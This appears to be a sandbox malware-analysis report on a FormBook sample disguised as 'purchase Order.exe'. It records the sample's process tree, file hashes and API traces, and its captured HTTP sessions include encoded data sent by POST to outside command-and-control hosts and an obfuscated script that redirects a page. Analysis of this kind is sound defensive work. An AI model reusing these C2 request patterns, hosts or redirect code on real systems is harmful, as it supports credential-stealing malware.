
Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49998	172.67.167.146	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:15:06.822534084 CET	483	OUT	GET /o362/?6vSXrZxp=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqTlrKzSCDFFwXYzga3uqvdEw6tCWfOw==&av=Zj6TS2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.rgenerousrs.store Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Nov 24, 2024 08:15:08.315754890 CET	1094	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:08 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2B7F1CKoJ2kk17r2Yumv2grFmCCdZYgFwxcj47gDc1uD78MnX0bALnJu1GnBlhxQ56XC4qbL3TZmRPcN8q%2B01N0wuG5FhDwQLmBqHFq%2B3NQgfWok%2BAkf1qFwfjwVeGjBPWgoQCeR6uA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779b25ee0841ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1725&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=483&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	49999	154.88.22.110	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:15:14.023761034 CET	738	OUT	POST /jhb8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.t91rl7.pro Origin: http://www.t91rl7.pro Referer: http://www.t91rl7.pro/jhb8/ Cache-Control: no-cache Content-Length: 197 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 53 6d 43 6b 30 43 74 78 41 44 47 68 68 69 70 33 75 65 62 6f 66 6d 33 4a 6e 56 76 6f Data Ascii: 6vSXrZxp=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/SmCk0CtxADGhhip3uebofm3JnVvo
Nov 24, 2024 08:15:15.568288088 CET	364	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Nov 2024 07:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Content-Encoding: gzip Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 59 51 ee 91 26 3e 79 81 a6 be e1 41 99 89 99 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 db 5e fe f5 5a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 67)N.,(ON,VPV/Ji%IAf>YQ&>yAf.6P^Z0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	50000	154.88.22.110	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:15:16.686587095 CET	762	OUT	POST /jhb8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.t91rl7.pro Origin: http://www.t91rl7.pro Referer: http://www.t91rl7.pro/jhb8/ Cache-Control: no-cache Content-Length: 221 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 33 75 67 79 6d 41 34 6e 51 72 59 45 4b 44 73 78 47 48 46 47 65 6c 55 6b 41 64 49 67 3d 3d Data Ascii: 6vSXrZxp=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKx3ugymA4nQrYEKDsxGHFGelUkAdIg==
Nov 24, 2024 08:15:18.193378925 CET	364	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Nov 2024 07:15:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Content-Encoding: gzip Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 59 51 ee 91 26 3e 79 81 a6 be e1 41 99 89 99 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 db 5e fe f5 5a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 67)N.,(ON,VPV/Ji%IAf>YQ&>yAf.6P^Z0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.9	50001	154.88.22.110	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:15:19.355782986 CET	1775	OUT	POST /jhb8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.t91rl7.pro Origin: http://www.t91rl7.pro Referer: http://www.t91rl7.pro/jhb8/ Cache-Control: no-cache Content-Length: 1233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 69 48 75 31 45 65 37 59 57 6e 49 51 7a 6c 6c 67 32 58 39 78 55 4b 41 55 6e 64 32 77 65 30 46 6e 2f 6d 41 48 73 58 65 75 52 67 46 79 4b 6d 70 6c 75 48 45 45 77 73 66 50 37 63 4f 6f 30 63 4f 6b 61 35 64 6b 66 41 51 6f 65 6c 6b 66 33 71 67 59 74 2b 76 4b 61 59 2f 54 50 70 7a 72 4b 77 72 2b 69 44 2b 57 65 4c 51 55 2b 6d 77 53 56 6f 2f 4e 56 46 37 5a 74 74 72 2f 58 57 57 55 52 46 53 4b 44 61 62 56 4f 36 61 30 43 68 66 6b 50 48 65 31 35 4c 73 6a 73 4b 56 51 44 58 31 6d 38 51 55 [TRUNCATED] Data Ascii: 6vSXrZxp=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnaE3y6Xzw3kFZv2IAWxhfxKxVCyfq7I+tsZXQgWlcTZhp03xBmlctEMXjLCy1xkYFCjqElntZwApsbYZtMyhkIUmP6IIaPMCCqrvP1hp4q1DEJWO/kAWziwMUaL3DxrfxiHu1Ee7YWnIQzllg2X9xUKAUnd2we0Fn/mAHsXeuRgFyKmpluHEEwsfP7cOo0cOka5dkfAQoelkf3qgYt+vKaY/TPpzrKwr+iD+WeLQU+mwSVo/NVF7Zttr/XWWURFSKDabVO6a0ChfkPHe15LsjsKVQDX1m8QUPCNZFvB4xMfFuWfhj/742OnP/VhvklvvYdLEY5pE1p01QtJ95jQVCd0E5GO1o882pc4M0pD12z1+pKhb6oLcy/w4JAEdlPQPydFo46FxmRhrHArn5YmdY7KFN2MtniQMopZgXN1a60exWORh2owbboVWnLAKisMrC0q31Y92pPPQGxggGHshlb2xW4y1IEF0c01bCK10o3kBGcHZf+CVE7i9yblbs/jSCTnFr2WyWe5rbEAm7qdwPsdyRJ3OXAnR4tDVxjzzvY2TXs2Zy99wtQCBhu2o4pFLciVsNKYqwPjOu11thPLRfvotGvubOPyPVRj2Lb7ahw+CTayCRx5fYcEpFEJGHdHaWO/yO1sOMAcWphPMlDwu8k/0xkSlUBVDiyfqNW9L2y08ht0KQgUXq7S3MsDQUtwcOSF4Qd16hHl/LODWcBIM+ElbaCEqkPhfkk/+v7hhc1oq8s69BH/f1x5BQHEFC/TC/aQM/xM9+GnSvPv4WuVvGu9/LiyIJEnU/ivDhrOt83Vk0XmXU0pcrfDHjsXpzJd4dA/pIK8DtDdccxpIF9UUtKKCtgwZKHREUs8ZXMLxEj7D7uQGV0/nq97fZQY59twUKRNX5Ep69STOdXSESO3hhRFekifD0a0uXASLjo1M1TtdTQMlmivp3v+PRiuK4rPnGK [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.9	50002	154.88.22.110	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:15:22.009342909 CET	476	OUT	GET /jhb8/?6vSXrZxp=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmvkZEk/wC7YtB6KW2U/08aXnOShntluQ==&av=Zj6TS2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.t91rl7.pro Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Nov 24, 2024 08:15:23.516329050 CET	332	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Nov 2024 07:15:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Data Raw: 35 35 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 39 6a 5a 47 59 34 4c 6e 51 35 4d 57 52 69 61 69 35 77 63 6d 38 36 4f 44 6b 78 4d 51 3d 3d 27 29 3c 2f 73 63 0d 0a 35 0d 0a 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 55<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9jZGY4LnQ5MWRiai5wcm86ODkxMQ==')</sc5ript>0

Target ID:	0
Start time:	02:12:25
Start date:	24/11/2024
Path:	C:\Users\user\Desktop\purchase Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\purchase Order.exe"
Imagebase:	0xc40000
File size:	1'209'344 bytes
MD5 hash:	E46648BD205F6E9908880C73A9CB2847
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:12:27
Start date:	24/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\purchase Order.exe"
Imagebase:	0xda0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:12:42
Start date:	24/11/2024
Path:	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe"
Imagebase:	0xd60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:12:44
Start date:	24/11/2024
Path:	C:\Windows\SysWOW64\bitsadmin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\bitsadmin.exe"
Imagebase:	0xe70000
File size:	186'880 bytes
MD5 hash:	F57A03FA0E654B393BB078D1C60695F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	02:12:57
Start date:	24/11/2024
Path:	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe"
Imagebase:	0xd60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:13:09
Start date:	24/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff73feb0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	63

Executed Functions

Function 00C6B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c28b6218325dd8599e1bcabfda455f38de994dc5d59520c51fe7b97d2f4de2
Instruction ID: 764a69bc2b8ca1df0c86846a980b03cd397d994a8f1e828e8dee84056ea78529
Opcode Fuzzy Hash: a2c28b6218325dd8599e1bcabfda455f38de994dc5d59520c51fe7b97d2f4de2
Instruction Fuzzy Hash: F8324775A022298BCB348F15DC81AE9B7B5FF4A314F1841E9E41AE7A91D7309EC1CF52

Function 00C43D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C43AA3,?), ref: 00C43D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00C43AA3,?), ref: 00C43D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00D01148,00D01130,?,?,?,?,00C43AA3,?), ref: 00C43DC8

Part of subcall function 00C46430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C43DEE,00D01148,?,?,?,?,?,00C43AA3,?), ref: 00C46471

SetCurrentDirectoryW.KERNEL32(?,?,?,00C43AA3,?), ref: 00C43E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CF28F4,00000010), ref: 00CB1CCE
SetCurrentDirectoryW.KERNEL32(?,00D01148,?,?,?,?,?,00C43AA3,?), ref: 00CB1D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CDDAB4,00D01148,?,?,?,?,?,00C43AA3,?), ref: 00CB1D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00C43AA3), ref: 00CB1D90

Part of subcall function 00C43E6E: GetSysColorBrush.USER32(0000000F), ref: 00C43E79
Part of subcall function 00C43E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00C43E88
Part of subcall function 00C43E6E: LoadIconW.USER32(00000063), ref: 00C43E9E
Part of subcall function 00C43E6E: LoadIconW.USER32(000000A4), ref: 00C43EB0
Part of subcall function 00C43E6E: LoadIconW.USER32(000000A2), ref: 00C43EC2
Part of subcall function 00C43E6E: RegisterClassExW.USER32(?), ref: 00C43F30

Part of subcall function 00C436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,ICTRLCREATETREEVIEW,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C436E6
Part of subcall function 00C436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C43707
Part of subcall function 00C436B8: ShowWindow.USER32(00000000,?,?,?,?,00C43AA3,?), ref: 00C4371B
Part of subcall function 00C436B8: ShowWindow.USER32(00000000,?,?,?,?,00C43AA3,?), ref: 00C43724

Part of subcall function 00C44FFC: _memset.LIBCMT ref: 00C45022
Part of subcall function 00C44FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C450CB

Strings

This is a third-party compiled AutoIt script., xrefs: 00CB1CC8
runas, xrefs: 00CB1D84

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: 5a8b3104c94ea69bb9c60cb82b9dbd6fa85863f8c35a139b9f924bb7c42e66f0
Instruction ID: cbd51358463b8bf24988a72cd3d3ac1ad8bc03ac22736c577b4bb3e84defe0f4
Opcode Fuzzy Hash: 5a8b3104c94ea69bb9c60cb82b9dbd6fa85863f8c35a139b9f924bb7c42e66f0
Instruction Fuzzy Hash: 54510634A05389AFCF15EBB0DC45FED7B75BB59700F044069F616A22E2DA704A49EB32

Function 00C5DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00C5DDEC
GetCurrentProcess.KERNEL32(00000000,00CDDC38,?,?), ref: 00C5DEAC
GetNativeSystemInfo.KERNELBASE(?,00CDDC38,?,?), ref: 00C5DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 00C5DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 00C5DF1F
GetSystemInfo.KERNEL32(?,00CDDC38,?,?), ref: 00C5DF29
GetSystemInfo.KERNEL32(?,00CDDC38,?,?), ref: 00C5DF35

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: cf7b785ea318da92eb8540243dfae4be301dee7fe06a7bed97c886967fb0c9e6
Instruction ID: 9b1d834bfc98393688e1b0d84e06f137a6b722cd6144f72dcfaa9ab382160501
Opcode Fuzzy Hash: cf7b785ea318da92eb8540243dfae4be301dee7fe06a7bed97c886967fb0c9e6
Instruction Fuzzy Hash: 8961A17580A384CBCF25CF6898C15ED7FB46F29301F1949D9DC469F207C6248A8DCB6A

Function 00C4406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C4449E,?,?,00000000,00000001), ref: 00C4407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C4449E,?,?,00000000,00000001), ref: 00C44092
LoadResource.KERNEL32(?,00000000,?,?,00C4449E,?,?,00000000,00000001,?,?,?,?,?,?,00C441FB), ref: 00CB4F1A
SizeofResource.KERNEL32(?,00000000,?,?,00C4449E,?,?,00000000,00000001,?,?,?,?,?,?,00C441FB), ref: 00CB4F2F
